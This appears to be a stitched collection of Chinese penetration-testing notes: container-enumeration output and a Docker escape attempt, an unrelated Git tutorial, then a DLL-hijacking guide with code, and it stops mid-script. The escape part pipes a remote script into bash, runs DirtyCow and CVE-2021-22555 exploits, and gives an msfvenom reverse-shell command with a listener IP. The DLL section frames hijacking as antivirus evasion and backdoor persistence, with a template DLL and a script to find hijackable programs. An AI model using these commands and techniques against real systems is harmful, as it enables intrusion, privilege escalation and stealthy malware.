2024/08/02 09:41:36 available commands:
    curl,wget,nc,find,ps,ssh,git,vi,mount,fdisk,base64
2024/08/02 09:41:36 Capabilities hex of Caps(CapInh|CapPrm|CapEff|CapBnd|CapAmb):
    CapInh:    0000000000000000
    CapPrm:    0000000000000000
    CapEff:    0000000000000000
    CapBnd:    00000000a80425fb
    CapAmb:    0000000000000000
    Cap decode: 0x0000000000000000 = 
[*] Maybe you can exploit the Capabilities below:

[  Information Gathering - Mounts  ]
0:43 / / rw,relatime - overlay overlay rw,lowerdir=/www/server/docker/overlay2/l/NSCUXYU2SH7AGXNOOQ5OC7FAOV:/www/server/docker/overlay2/l/53DNNOLPDNI6VPFZVQMKIIWUNN:/www/server/docker/overlay2/l/FQUDZJF757X57UWRM6BMVDRJAP:/www/server/docker/overlay2/l/ROV2U2RMIFBP2N7II6NXNE35XN:/www/server/docker/overlay2/l/NOYTPWJ7FBUTGKZOBCSJYIZUZC:/www/server/docker/overlay2/l/QUIXANYPUT7WCXU7QZKHILBFVS:/www/server/docker/overlay2/l/4EJWLOWVNNASRB7SJJZJE2NWJO:/www/server/docker/overlay2/l/2LXDDY5MP4ILKSAVUSGD3VTKX2,upperdir=/www/server/docker/overlay2/9400c71ab508f73c6290fbc01bc3e0bdf5a20b49cf23e0fd7c465d795f9fff01/diff,workdir=/www/server/docker/overlay2/9400c71ab508f73c6290fbc01bc3e0bdf5a20b49cf23e0fd7c465d795f9fff01/work
0:103 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
0:104 / /dev rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:105 / /dev/pts rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=666
0:106 / /sys ro,nosuid,nodev,noexec,relatime - sysfs sysfs ro
0:107 / /sys/fs/cgroup rw,nosuid,nodev,noexec,relatime - tmpfs tmpfs rw,mode=755
0:22 /docker/f861030b02b45a00db49f9989627a7393b186ef0cf32cef321b0e14f831c2940 /sys/fs/cgroup/systemd ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,xattr,release_agent=/usr/lib/systemd/systemd-cgroups-agent,name=systemd
0:24 /docker/f861030b02b45a00db49f9989627a7393b186ef0cf32cef321b0e14f831c2940 /sys/fs/cgroup/hugetlb ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,hugetlb
0:25 /docker/f861030b02b45a00db49f9989627a7393b186ef0cf32cef321b0e14f831c2940 /sys/fs/cgroup/memory ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,memory
0:26 /docker/f861030b02b45a00db49f9989627a7393b186ef0cf32cef321b0e14f831c2940 /sys/fs/cgroup/devices ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,devices
0:27 /docker/f861030b02b45a00db49f9989627a7393b186ef0cf32cef321b0e14f831c2940 /sys/fs/cgroup/cpu,cpuacct ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,cpuacct,cpu
0:28 /docker/f861030b02b45a00db49f9989627a7393b186ef0cf32cef321b0e14f831c2940 /sys/fs/cgroup/freezer ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,freezer
0:29 /docker/f861030b02b45a00db49f9989627a7393b186ef0cf32cef321b0e14f831c2940 /sys/fs/cgroup/blkio ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,blkio
0:30 /docker/f861030b02b45a00db49f9989627a7393b186ef0cf32cef321b0e14f831c2940 /sys/fs/cgroup/net_cls,net_prio ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,net_prio,net_cls
0:31 /docker/f861030b02b45a00db49f9989627a7393b186ef0cf32cef321b0e14f831c2940 /sys/fs/cgroup/cpuset ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,cpuset
0:32 /docker/f861030b02b45a00db49f9989627a7393b186ef0cf32cef321b0e14f831c2940 /sys/fs/cgroup/pids ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,pids
0:33 /docker/f861030b02b45a00db49f9989627a7393b186ef0cf32cef321b0e14f831c2940 /sys/fs/cgroup/perf_event ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,perf_event
0:102 / /dev/mqueue rw,nosuid,nodev,noexec,relatime - mqueue mqueue rw
8:1 /www/server/docker/volumes/448e820286d53434f2900f325eab41b060be953fc9f53d7cc9db6d710f29caac/_data /backup rw,relatime - ext4 /dev/sda1 rw,data=ordered
8:1 /www/wwwroot/0.0.0.0/server/docker/amd64/services/gogs-data /data rw,relatime - ext4 /dev/sda1 rw,data=ordered
0:96 / /dev/shm rw,nosuid,nodev,noexec,relatime - tmpfs shm rw,size=65536k
8:1 /www/server/docker/containers/f861030b02b45a00db49f9989627a7393b186ef0cf32cef321b0e14f831c2940/resolv.conf /etc/resolv.conf rw,relatime - ext4 /dev/sda1 rw,data=ordered
8:1 /www/server/docker/containers/f861030b02b45a00db49f9989627a7393b186ef0cf32cef321b0e14f831c2940/hostname /etc/hostname rw,relatime - ext4 /dev/sda1 rw,data=ordered
8:1 /www/server/docker/containers/f861030b02b45a00db49f9989627a7393b186ef0cf32cef321b0e14f831c2940/hosts /etc/hosts rw,relatime - ext4 /dev/sda1 rw,data=ordered
0:103 /bus /proc/bus ro,nosuid,nodev,noexec,relatime - proc proc rw
0:103 /fs /proc/fs ro,nosuid,nodev,noexec,relatime - proc proc rw
0:103 /irq /proc/irq ro,nosuid,nodev,noexec,relatime - proc proc rw
0:103 /sys /proc/sys ro,nosuid,nodev,noexec,relatime - proc proc rw
0:103 /sysrq-trigger /proc/sysrq-trigger ro,nosuid,nodev,noexec,relatime - proc proc rw
0:108 / /proc/acpi ro,relatime - tmpfs tmpfs ro
0:104 /null /proc/kcore rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:104 /null /proc/keys rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:104 /null /proc/timer_list rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:104 /null /proc/timer_stats rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:104 /null /proc/sched_debug rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:109 / /proc/scsi ro,relatime - tmpfs tmpfs ro
0:110 / /sys/firmware ro,relatime - tmpfs tmpfs ro
0:111 / /sys/devices/virtual/powercap ro,relatime - tmpfs tmpfs ro

[  Information Gathering - Net Namespace  ]
    container net namespace isolated.

[  Information Gathering - Sysctl Variables  ]
2024/08/02 09:41:36 net.ipv4.conf.all.route_localnet = 0

[  Information Gathering - DNS-Based Service Discovery  ]
error when requesting coreDNS: lookup any.any.svc.cluster.local. on 127.0.0.11:53: no such host
error when requesting coreDNS: lookup any.any.any.svc.cluster.local. on 127.0.0.11:53: no such host

[  Discovery - K8s API Server  ]
2024/08/02 09:41:36 checking if api-server allows system:anonymous request.
err found while searching local K8s apiserver addr.:
err: cannot find kubernetes api host in ENV
    api-server forbids anonymous request.
    response:

[  Discovery - K8s Service Account  ]
load K8s service account token error.:
open /var/run/secrets/kubernetes.io/serviceaccount/token: no such file or directory

[  Discovery - Cloud Provider Metadata API  ]
2024/08/02 09:41:37 failed to dial Alibaba Cloud API.
2024/08/02 09:41:38 failed to dial Azure API.
2024/08/02 09:41:38 failed to dial Google Cloud API.
2024/08/02 09:41:38 failed to dial Tencent Cloud API.
2024/08/02 09:41:39 failed to dial OpenStack API.
2024/08/02 09:41:40 failed to dial Amazon Web Services (AWS) API.
2024/08/02 09:41:41 failed to dial ucloud API.

[  Exploit Pre - Kernel Exploits  ]
2024/08/02 09:41:41 refer: https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2016-5195] dirtycow

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},[ RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7} ],ubuntu=16.04|14.04|12.04
   Download URL: https://www.exploit-db.com/download/40611
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2016-5195] dirtycow 2

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,[ RHEL=5|6|7 ],ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
   Download URL: https://www.exploit-db.com/download/40839
   ext-url: https://www.exploit-db.com/download/40847
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2017-1000253] PIE_stack_corruption

   Details: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.txt
   Exposure: probable
   Tags: RHEL=6,[ RHEL=7 ]{kernel:3.10.0-514.21.2|3.10.0-514.26.1}
   Download URL: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.c

[+] [CVE-2021-27365] linux-iscsi

   Details: https://blog.grimm-co.com/2021/03/new-old-bugs-in-linux-kernel.html
   Exposure: less probable
   Tags: RHEL=8
   Download URL: https://codeload.github.com/grimm-co/NotQuite0DayFriday/zip/trunk
   Comments: CONFIG_SLAB_FREELIST_HARDENED must not be enabled

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded

[+] [CVE-2019-15666] XFRM_UAF

   Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
   Exposure: less probable
   Download URL: 
   Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled

[+] [CVE-2017-7308] af_packet

   Details: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
   Exposure: less probable
   Tags: ubuntu=16.04{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c
   Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels

[+] [CVE-2017-6074] dccp

   Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
   Exposure: less probable
   Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}
   Download URL: https://www.exploit-db.com/download/41458
   Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass

[+] [CVE-2016-2384] usb-midi

   Details: https://xairy.github.io/blog/2016/cve-2016-2384
   Exposure: less probable
   Tags: ubuntu=14.04,fedora=22
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c
   Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user

[+] [CVE-2015-9322] BadIRET

   Details: http://labs.bromium.com/2015/02/02/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/
   Exposure: less probable
   Tags: RHEL<=7,fedora=20
   Download URL: http://site.pi3.com.pl/exp/p_cve-2014-9322.tar.gz

[+] [CVE-2015-8660] overlayfs (ovl_setattr)

   Details: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/
   Exposure: less probable
   Tags: ubuntu=(14.04|15.10){kernel:4.2.0-(18|19|20|21|22)-generic}
   Download URL: https://www.exploit-db.com/download/39166

[+] [CVE-2015-8660] overlayfs (ovl_setattr)

   Details: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/39230

[+] [CVE-2014-5207] fuse_suid

   Details: https://www.exploit-db.com/exploits/34923/
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/34923

[+] [CVE-2014-4014] inode_capable

   Details: http://www.openwall.com/lists/oss-security/2014/06/10/4
   Exposure: less probable
   Tags: ubuntu=12.04
   Download URL: https://www.exploit-db.com/download/33824

[+] [CVE-2014-0196] rawmodePTY

   Details: http://blog.includesecurity.com/2014/06/exploit-walkthrough-cve-2014-0196-pty-kernel-race-condition.html
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/33516

[+] [CVE-2014-0038] timeoutpwn

   Details: http://blog.includesecurity.com/2014/03/exploit-CVE-2014-0038-x32-recvmmsg-kernel-vulnerablity.html
   Exposure: less probable
   Tags: ubuntu=13.10
   Download URL: https://www.exploit-db.com/download/31346
   Comments: CONFIG_X86_X32 needs to be enabled

[+] [CVE-2014-0038] timeoutpwn 2

   Details: http://blog.includesecurity.com/2014/03/exploit-CVE-2014-0038-x32-recvmmsg-kernel-vulnerablity.html
   Exposure: less probable
   Tags: ubuntu=(13.04|13.10){kernel:3.(8|11).0-(12|15|19)-generic}
   Download URL: https://www.exploit-db.com/download/31347
   Comments: CONFIG_X86_X32 needs to be enabled

[+] [CVE-2016-0728] keyring

   Details: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/40003
   Comments: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working


[  Information Gathering - Sensitive Files  ]
    .dockerenv - /.dockerenv
    /.bash_history - /data/git/.bash_history
    /.ssh/ - /data/git/.ssh/environment
    .git/ - /data/git/gogs-repositories/zhangsan/test.git/HEAD
    .git/ - /data/git/gogs-repositories/zhangsan/test.git/archives
    .git/ - /data/git/gogs-repositories/zhangsan/test.git/branches
    .git/ - /data/git/gogs-repositories/zhangsan/test.git/config
    .git/ - /data/git/gogs-repositories/zhangsan/test.git/custom_hooks
    .git/ - /data/git/gogs-repositories/zhangsan/test.git/description
    .git/ - /data/git/gogs-repositories/zhangsan/test.git/hooks
    .git/ - /data/git/gogs-repositories/zhangsan/test.git/info
    .git/ - /data/git/gogs-repositories/zhangsan/test.git/objects
    .git/ - /data/git/gogs-repositories/zhangsan/test.git/refs

[  Information Gathering - ASLR  ]
2024/08/02 09:41:43 /proc/sys/kernel/randomize_va_space file content: 2
2024/08/02 09:41:43 ASLR is enabled.

[  Information Gathering - Cgroups  ]
2024/08/02 09:41:43 /proc/1/cgroup file content:
11:perf_event:/docker/f861030b02b45a00db49f9989627a7393b186ef0cf32cef321b0e14f831c2940
10:pids:/docker/f861030b02b45a00db49f9989627a7393b186ef0cf32cef321b0e14f831c2940
9:cpuset:/docker/f861030b02b45a00db49f9989627a7393b186ef0cf32cef321b0e14f831c2940
8:net_prio,net_cls:/docker/f861030b02b45a00db49f9989627a7393b186ef0cf32cef321b0e14f831c2940
7:blkio:/docker/f861030b02b45a00db49f9989627a7393b186ef0cf32cef321b0e14f831c2940
6:freezer:/docker/f861030b02b45a00db49f9989627a7393b186ef0cf32cef321b0e14f831c2940
5:cpuacct,cpu:/docker/f861030b02b45a00db49f9989627a7393b186ef0cf32cef321b0e14f831c2940
4:devices:/docker/f861030b02b45a00db49f9989627a7393b186ef0cf32cef321b0e14f831c2940
3:memory:/docker/f861030b02b45a00db49f9989627a7393b186ef0cf32cef321b0e14f831c2940
2:hugetlb:/docker/f861030b02b45a00db49f9989627a7393b186ef0cf32cef321b0e14f831c2940
1:name=systemd:/docker/f861030b02b45a00db49f9989627a7393b186ef0cf32cef321b0e14f831c2940
2024/08/02 09:41:43 /proc/self/cgroup file added content (compare pid 1) :

逃逸验证脚本

f861030b02b4:/tmp$ wget https://raw.githubusercontent.com/teamssix/container-escape-check/main/container-escape-check.sh -O -| bash
<ape-check/main/container-escape-check.sh -O -| bash
Connecting to raw.githubusercontent.com (185.199.109.133:443)
writing to stdout

=============================================================
                Containers Escape Check v0.3                 
-------------------------------------------------------------
                     Author:  TeamsSix                       
                     Twitter: TeamsSix                       
                     Blog: teamssix.com                      
             WeChat Official Accounts: TeamsSix              
 Project Address: github.com/teamssix/container-escape-check 
=============================================================

-                    100% |********************************| 15344  0:00:00 ETA
written to stdout
[!] Currently in a container, checking ......
[+] The current container has the CVE-2016-5195 DirtyCow vulnerability.
[+] The current container has the CVE-2021-22555 vulnerability.
[!] It is detected that the capsh command does not exist in the current system, and the command is being installed.
[!] capsh command installation failed.
[!] Check completed.
f861030b02b4:/tmp$

• 执行CVE-2021-22555 EXP 。失败，因为我在容器里面是git权限

f861030b02b4:/tmp$ ./exploit
./exploit
[-] unshare(CLONE_NEWUSER): Operation not permitted
[+] Linux Privilege Escalation by theflow@ - 2021

[+] STAGE 0: Initialization
[*] Setting up namespace sandbox...

• 执行脏牛提权，发现我不是全tty shell

  f861030b02b4:/tmp$ chmod +x dcow
  chmod +x dcow
  f861030b02b4:/tmp$ ./dcow
  ./dcow
  bash: [19926: 6 (255)] tcsetattr: Not a tty
  f861030b02b4:/tmp$ exit
  

• 获取tty shell的方法，但是docker 中没有script

  /usr/bin/script -qc /bin/bash /dev/null
  

遇到的问题

docker 容器下，不是全tty shell，

• 获取tty shell的方法

• 参考: If you are stuck on getting a TTY... - Information Security | Facebook

  /usr/bin/script -qc /bin/bash /dev/null
  

• 还有就是使用metasploit 来获取，这样就会是全tty shell了

  # 生成Linux 的payload ，然后在docker 里面执行上线
  msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=186.38.175.68 LPORT=7758 -o reshell -f elf
  

参考文章

• 容器逃逸方法检测指北 | T Wiki (teamssix.com)
• V0WKeep3r/CVE-2024-21626-runcPOC (github.com)
• 【云原生渗透】- 特权容器设备挂载逃逸漏洞 - 火线 Zone-安全攻防社区 (huoxian.cn)
• 浅谈Docker逃逸 - 先知社区 (aliyun.com)
• 关于一次python获得完整交互式shell的研究 - 先知社区 (aliyun.com)

---

参考

方糖技能栈 (ftqq.com)

版本控制系统的基本需求

将版本控制比作一个时间机器，将项目放到这样一个时间轴上，我们可以随时回到任何一个特定的版本。

为了实现这一点，需要记录每个版本的完整信息，方便快速回到对应版本，这种方式称为全量方案。

对于代码和文本这类字符型内容，全量方案更为适用，因为它们占用的空间相对较小。而对于视频和大型二进制内容，增量方案能更好地节省空间。

Git选择将所有版本信息放在项目根目录的 .git 文件夹中。

[!WARNING] > 发布网站时，不要将 .git 目录发布出去，因为 .git 文件夹中包含着整个版本信息，包括源代码和可能存在的账号密码，都可以通过这个 .git 目录访问到。

Git使用文件的 SHA1 值作为文件名，SHA1 和 MD5 都是哈希函数，通过计算文件内容提取较短的哈希值，保证版本库中所有相同内容的文件只保存一份。

tree结构和暂存区

tree 结构

在Git中，标记为 tree 的是目录，blob 是文件。

如果子目录中的文件修改了，文件的 SHA1 值会发生变化，那么文件夹的 SHA1 值也会发生变化，这些值的变动会保存到新的文件中，从而完成更新内容的信息存储。

文件内容会保存到 Objects 目录中。对于内容非常大的文件，Git使用哈希值的前两位来管理文件。

如果自动提交会生成很多无用版本，因此建议使用手动操作。

暂存区

git add .      # 将目录添加到暂存区
git commit .   # 将暂存区的文件提交到 .git 目录中

文件状态判断：

• 如果文件在代码和暂存区中，但SHA1值不匹配，则文件已修改。
• 如果文件不在代码中但在暂存区中，则文件已删除。
• 如果文件在代码中但不在暂存区中，则文件是新增的。

对比暂存区和 .git 也能知道文件的状态。

文件从暂存区提交到Git中会产生一个快照，描述当前文件夹下所有文件的状态。

不断提交操作会产生多个快照，形成一个链表。使用指针 HEAD 指向最新快照，当需要某个快照时，将 HEAD 指针指向该快照，然后 checkout 即可恢复工作区内容。

协同和分支

网络问题

团队环境下，代码仓库应放在服务器上，集中访问。若网络出现问题，无法同步版本管理，可以在主机上放置一个Git版本管理软件，待网络恢复后再将本地版本上传至服务器。

如果服务器上有不同部分需要分别修改，两个工程师将文件同步到本地仓库后，根据需求修改文件，服务器端可以很容易同步不同文件的修改。

文件问题

若同时修改相同文件，会产生冲突。第一位同事先提交，服务器正常接受，第二位同事提交时，产生冲突，需手动解决冲突后再提交。

分支

为了管理不同功能或开发者的工作，可以使用分支。假设生产环境是 online，开发环境是 dev，在开发分支内测公测完后合并到 online，保证线上代码的稳定性，同时能将测试代码 checkout 到分支环境。

合并

Merge

找到两个分支的共同祖先，进行三方合并，合并后的提交叫 Merge。

git checkout wechat 
git merge weibo

Rebase

git checkout weibo 
git rebase wechat

Git会找到共同提交，撤销微博线的提交并保存到临时目录，将 wechat 的提交应用到 weibo 分支中，形成新的 weibo 分支。

Cherry-pick

在 wechat 分支上只想合并 weibo 分支的某些特定提交，可以使用 cherry-pick。

git checkout wechat 
git cherry-pick 324e

回顾

Git采用全量存储方式保存历史文件，历史版本库中包含完整信息，存储在 .git 目录中。文件内容的 SHA1 值作为名称，相同文件只存储一份，通过内容寻址。Git定义了 tree 目录结构描述和容纳目录及文件的 SHA1 值，暂存区作为源代码和版本库之间的中间层，当暂存区内的代码上传到版本库时，会产生新的提交（commit），多个提交形成链表，使用 checkout 对应的链表值，可以回到对应的版本。Git提供了分支概念，支持在不同分支下进行工作，最终合并到 master 上。在本地仓库和远程仓库之间，网络状态良好时提交到远程仓库中。对于合并，使用 Merge 和 Rebase 两种方式，Rebase 修改提交历史，建议在本地使用。通过分支管理，可以实现不同功能或开发者的独立工作，并在最终合并到主分支当中。

Git 常用命令

本地仓库相关

git init    #使用git初始化命令

git add a.txt   # 将a.txt 添加到暂存区

git add .       # 将当前目录添加到暂存区

git reset a.txt   #将文件移出暂存区

cd .git && ls -lha
cd objects && ls -lha

#git 查看文件内容
git cat-file -p 7a22f4fd0865519b0abfeca803b051260866b5cd

#需要将文件名22f4fd0865519b0abfeca803b051260866b5cd 与上一级的文件目录 7a 拼接起来

#git 查看暂存区中的文件
git ls-files --stage 

#git 通过commit 命令提交内容

git commit -m "first push"

#创建新分支

git branch dev

git checkout dev    #切换到dev分支

git commit -m "dev" 

# checkout 回master ，创建ops 分支，切换到ops分支
git checkout master && git branch ops && git checkout ops

# checkout 回master,合并dev分支
git checkout master && git merge dev

#放弃合并
git merge --about

# 再次提交

git add a.txt && git commit -m "merged"

# 查看日志

git log

# 这里面是完整的hash值，可以git checkout sha1值，来切换到对应的版本信息
git log sha1

远程仓库相关

#首先先在github上创建一个项目

git remote add origin url

# 上传到github上
git push -u origin main

# 从github上拉代码下来
git pull 

# 查看远程仓库配置
git remote

git remote show origin

# 修改远程仓库配置

git remote remove origin

git remote add origin url

git push

# 将修改的内容缓存起来
git stash

git stash apply

git stash list

git stash show 

---

参考

DLL劫持 快速挖掘 工具开发

介绍

dll文件 就是动态链接库文件，里面有很多函数。exe 如果需要使用这些函数就需要去加载dll文件。dll劫持就是把这个dll文件给替换掉，替换成我们的恶意dll文件。exe在加载恶意dll后就会运行恶意代码。

所以我们需要满足几个条件

• dll名称要正确
• dll与exe在同一个文件夹内(这个条件不是绝对的，exe在加载dll文件时有加载目录顺序)
• dll的导出表要正确

exe文件有一个导入表，导入表中包含了需要加载哪些dll的哪些函数 dll文件有一个导出表，导出表中显示了它能提供哪些函数 只有导入表和导出表相对应的时候，这个dll文件才能被正确加载

怎么才能让dll文件的导出表是正确的呢

就需要去查看exe的导入表

DUMPBIN 参考

工具参考路径

D:\Program Files\Microsoft Visual Studio\2022\Professional\VC\Tools\MSVC\14.38.33130\bin\Hostx64\x64

dumpbin /imports phpstudy_pro.exe

这样就能查看使用了哪些dll文件的哪些函数，但是如下图所示，dll函数中存在问号，如果dll中有这种函数，就不使用这个dll。

正常的使用的dll文件如下图所示，会是正常的函数名

创建dll

创建DLL文件，启动Visual Studio并创建一个新项目。在给出的项目模板中，选择 Dynamic-Link Library (DLL) 选项

接下来，选择保存项目文件的位置。 保存项目后，应该会出现 dllmain.cpp 以及默认的 DLL 代码。

在这里我们只关注函数名称，至于它的返回值是什么类型和函数体是什么样的，我们不关心

// dllmain.cpp : 定义 DLL 应用程序的入口点。

// 包含预编译头文件（如果使用了）
#include "pch.h"

// 包含必要的头文件
#include <iostream>

// 在此处定义导出函数声明，这些函数将在DLL中被导出
extern "C" __declspec(dllexport) int JLI_GetStdArgc() { return 0; }
extern "C" __declspec(dllexport) int JLI_GetStdArgs() { return 0; }
extern "C" __declspec(dllexport) int JLI_Launch() { return 0; }
extern "C" __declspec(dllexport) int JLI_MemAlloc() { return 0; }
extern "C" __declspec(dllexport) int JLI_CmdToArgs() { return 0; }

// DLL入口点函数
BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD ul_reason_for_call,
    LPVOID lpReserved
)
{
    // 根据调用原因进行不同的处理
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        // 当进程附加到DLL时执行的代码
        MessageBoxA(NULL, "Success!!!", "DLL Hijacking", MB_OK); // 显示一个消息框
        exit(0); // 退出进程
        break;

    case DLL_THREAD_ATTACH:
        // 当线程附加到DLL时执行的代码
        break;

    case DLL_THREAD_DETACH:
        // 当线程从DLL分离时执行的代码
        break;

    case DLL_PROCESS_DETACH:
        // 当进程从DLL分离时执行的代码
        break;
    }

    return TRUE; // 返回TRUE表示初始化成功
}

然后这里的话相当于写C语言的Main函数

BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD ul_reason_for_call,
    LPVOID lpReserved
)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        MessageBoxA(NULL, "Success!!!", "DLL Hijacking", MB_OK);
        exit(0);
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

当dll文件刚被加载的时候，会首先调用这里的代码

为什么要退出程序呢？因为我们这个dll是一个错误的dll，exe加载了这个错误的dll后可能会崩溃或卡住，这样的话就会有一些嫌疑特征。我们就主动退出程序。

然后还有一些条件，因为我们做dll劫持是通过白+黑进行免杀，所以我们的白文件要足够的白。

• 选择要替换的dll，他最好不是一个微软的dll。如果你的dll名称和微软的dll文件名称相同的话就可能被微软杀掉。
• 还有就是exe要有真实数字签名，这样文件足够白，但是我们不能自己打一个签名，如果直接打一个假的数字签名的话，那他会被Windows default 杀掉
• EXE的位数要正确

dll Main 函数最好设置为进程迁移的操作，就是把后门迁移到其他白进程，因为这个进程加载了错误的dll文件会崩溃，那我们的后门就关闭了，那我们可以通过远程进程注入的方式把进程迁移到其他白程序，如果你要使用远程进程注入的话，那你只能使用一个64位的程序注入64位的程序

所以dll程序怎么进行手工挖掘呢

可以下载第三方exe，把它安装在虚拟机当中，然后找到它的安装目录，安装目录里通常会有很多exe文件，可以挨个看exe符不符合这些条件。可以看exe文件的导入表，有没有使用非微软的dll，并且函数都是正常的函数，然后就可以对这个exe进行dll劫持。然后就可以编写一个dll文件，把导出文件定义好，就可以生成一个dll文件。

也可以通过 Process Monitor来进行挖掘

查看应用程序位数和数字签名

Sigcheck

sigcheck64 phpstudy_pro.exe

然后Publisher 字段能看到应用程序有没有数字签名 Publisher: n/a 代表没有数字签名

DLL 劫持 自动化挖掘

https://github.com/HexNy0a/SkyShadow

import re
import os
import sys

def GetPayload(path, exeName):
    hijackableDLLs = {}
    exeFullPath = path + '/' + exeName
    exeSize = os.path.getsize(exeFullPath)
    if exeSize > 10 * 1024 * 1024: # 10MB
        return
    # 获取导入表
    imports = os.popen('dumpbin /imports "' + exeFullPath + '"').read()
    # 匹配 DLL 信息
    dllsInfo = re.findall('([\S]+\.[dlDL]{3})[\s\S]+?\n\n([\s\S]+?\n)\n', imports)
    for dllInfo in dllsInfo:
        dllName = dllInfo[0]
        if '?' not in dllInfo[1] and dllName.lower() not in MicrosoftDlls:
            functionNames = re.findall('[0-9A-F][\s]([\S]+)\n', dllInfo[1])
            hijackableDLLs[dllName] = functionNames # {'xxx.dll': ['func1', 'func2', ...], ...}
    # 获取 EXE 信息
    if hijackableDLLs:
        print(exeFullPath)
        # 文件大小
        if exeSize > 1024 * 1024:
            exeSize = str(round(exeSize/(1024 * 1024), 2)) + 'MB'
        elif exeSize > 1024:
            exeSize = str(round(exeSize/1024, 2)) + 'KB'
        else:
            exeSize = str(round(exeSize, 2)) + 'B'
        # 位数
        sigcheck = os.popen('sigcheck64 -accepteula "' + exeFullPath + '"').read()
        if '64-bit' in sigcheck:
            bit = 'x64'
        elif '32-bit' in sigcheck:
            bit = 'x86'
        # 数字签名
        if re.search('Publisher:[\s]+n/a', sigcheck):
            publisher = ' '
            payload = [bit + ' ' + exeSize + ' 无数字签名 ' + exeName]
        else:
            publisher = '数字签名 '
            payload = [bit + ' ' + exeSize + ' 有数字签名 ' + exeName]
        # 生成导出函数
        for dllName, functionNames in hijackableDLLs.items():
            payload += ['\n' + dllName]
            for functionName in functionNames:
                payload += ['extern "C" __declspec(dllexport) int ' + functionName + '() { return 0; }']
        # 写入文件
        fileName = bit + ' ' + exeSize + ' ' + publisher + exeName
        try:
            os.mkdir('Payload')
        except:
            pass
        try:
            os.mkdir('Payload/' + fileName)
        except:
            pass
        with open('Payload/' + fileName + '/' + fileName + '.txt', 'w') as f:
            f.write('\n'.join(payload))
        os.popen('copy "' + exeFullPath.replace('/', '\\') + '" "' + os.getcwd() + '/Payload/' + fileName + '"')
        
# 收集微软 DLL  递归变量文件夹 收集dll
def Scan(path, suffix):
    try:
        for fileName in os.listdir(path):
            if os.path.isdir(path + '/' + fileName): # 文件夹
                Scan(path + '/' + fileName, suffix)
            elif fileName[-4:] == suffix:
                if fileName[-4:] == '.dll': # DLL
